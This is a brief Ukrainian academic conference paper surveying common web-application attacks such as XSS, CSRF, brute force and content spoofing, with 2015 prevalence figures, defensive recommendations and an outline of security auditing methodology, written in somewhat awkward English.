Modern information
technologies / 4. Information Security
Shcherbatenko
V.M.1, Zakharova
M.V.2, Liuta M.V. 1
Kyiv National University of Technologies and Design1
Cherkasy State Technological University2, Ukraine
Analysis of dangerous attacks to increase security of
web-applications on the
Internet
Online application security is becoming one of the main problems for
ensuring not only the safety of websites, but also many corporate applications
running over the Internet.
The aim of this work is to identify the main vulnerabilities of Web
applications, the analysis of dangerous attacks, the definition of the best
methods of protection to increase the level of security of web applications.
The most important criterion for the proper functioning of all web applications
is security, but hacking is a frequent phenomenon. In order to avoid breaking a web application, you need
to identify all vulnerabilities. One of the vulnerabilities of web servers is the
"holes" in their software. It refers to the server programs themselves, such as
Apache, Microsoft Internet Information Server etc. The software is quite voluminous and complex, so there
are "holes" in it.
"Holes" are often found not in the entire line of web servers
but only in some of their releases. The more popular one or another software is, the more vulnerable
it is.
When analyzing attacks on web applications, some of the most dangerous
ones were identified:
The most popular attack is "Insufficient of transport layer
protection" - receiving data during transmission. By means of this
attack 70% web-resources can be damaged.
For the failure to use this attack, HTTPS protocol must be used.
Information leakage is the next type of attack. This attack can damage
56% of the resources. Information leakage occurs as a result of a failure or
improper operation of the program. To exclude this possibility, you need to
constantly test the program and check the messages on the server side.
Cross-site scripting attack - cross-site scripting can be executed on
47% of resources. The attack allows you to pass the JavaScript code to
use in the user's browser. Attacks of this type are often referred to as HTML
injections. For the defense it is necessary to clear and validate the input data
The generation of a large number
of requests, or the selection of passwords ("Bruteforce"),
can be performed on 29% of the resources. For the defense it is necessary to ensure the use of
high complexity passwords, server configuration for the analysis of incoming
requests, and use CAPTHA after several incorrectly entered passwords.
Attack "Contentpoofing" - substitute
data through the replacement of content pages is possible for 26% of resources. Using this
technique, the attacker forces the user to believe that the page is generated
by the web server, rather than being transmitted from an external source. For the defense
from this type of attacks it is necessary to refuse the use of frames and, most
importantly, never send absolute or local paths to files in the parameters.
The type of attacks on website visitors that uses the disadvantages of
the HTTP protocol is «Cross-site request forgery». This attack can be executed on 24% of resources. For the defence it
is necessary to verify the input data from forms, for example, by adding a
unique application [2].
One of the methods of defending web applications and identifying
vulnerable zones is the ongoing auditing of web applications. The main works
that is carried out while auditing security of web resources are identifying
vulnerabilities that allow unauthorized access to closed areas of web
applications; attempts to modify the information of web services; testing of
the possibility of implementation and implementation of arbitrary malicious
code; SQL Injection Stability Test; Cross Site Scripting, XSS, script code
analysis, detection of vulnerabilities in operating systems on which web
servers operate; reporting on vulnerabilities and risks found, as well as
recommendations for their elimination, testing of Dos / DDos
attacks.
When conducting an audit, experts analyze the web application, operating
system and database. It uses tool scanning, manual analysis which greatly
increases the quality of work (Fig. 1).
Tool analysis involves scanning of a web resource with the help of a
vulnerability scanner, as well as other specialized applications such as
Wapiti, Netsparker Community Edition.
Manual analysis is the second kind of scanning when an application is deployed
on a dedicated server, and experts do the testing of the application manually
using all possible methods and attacks on the applications. After that, the
detailed report of the stability of applications to certain attacks is made,
including attacks of type of denial of service [1].
Fig.
1- Methodology
for auditing the security of web applications
Therefore, for the defense from the most popular types of attacks, it is
necessary to properly check the input data, use the encrypted HTTPS protocol,
and use a framework that has built-in validation, encryption and validation
mechanisms. Besides, conducting a permanent safety audit, monitoring of web
resources will ensure the reliability of the application and will increase the
level of protection of the applications.
Reference
1. Web resource security rating: 2015. - Company of Informational
Security, 2015. - Online access mode:
http://itland.com.ua/services/penetration-service/web-application-penetration-testing/
2. Website Security Statistics Report: 2015. - WhiteHat
Security 2015. - Internet access mode: https://info.whitehatsec.com/Website-Stats-Report-2015.html
3. Collabrece J. Web Application Security -
Ready Solutions / J. Scambreyz, M. Shema. - M .: Williams Publishing House, 2003. - 384 pp.